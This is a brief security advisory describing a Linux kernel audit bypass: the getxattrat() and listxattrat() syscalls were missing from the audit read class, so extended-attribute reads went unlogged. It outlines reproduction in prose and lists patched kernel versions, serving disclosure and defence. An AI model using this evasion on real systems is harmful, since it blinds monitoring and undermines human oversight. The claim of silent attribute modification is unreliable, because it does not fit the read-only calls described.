Linux Kernel Audit Subsystem Bypass Vulnerability via Missing Syscalls

A vulnerability in the Linux kernel audit subsystem allows for bypassing audit rules due to missing system calls in the audit read class. The 'at' variants of 'getxattr()' and 'listxattr()' were not included in the audit read class, which meant that calls to 'getxattrat()' or 'listxattrat()' could read extended attributes from files without triggering any audit notifications. This oversight could be exploited to manipulate file attributes or query extended attributes stealthily, evading detection by the audit subsystem.

Impact

Exploitation of this vulnerability allows for silent modifications of file attributes or extended attribute queries without triggering corresponding audit notifications, creating potential blind spots in system monitoring.

Reproduction

The vulnerability can be reproduced by adding an audit rule to monitor read operations on a specific file, then using the 'getxattrat()' or 'listxattrat()' system calls to access extended attributes of that file. The absence of an audit notification will indicate the successful bypass.

Remediation

Users can update to Linux kernel versions 7.0 or later, or to the LTS versions 5.10, 5.15, 6.1, 6.6, 6.12, 6.18, or 6.19, where this vulnerability has been patched.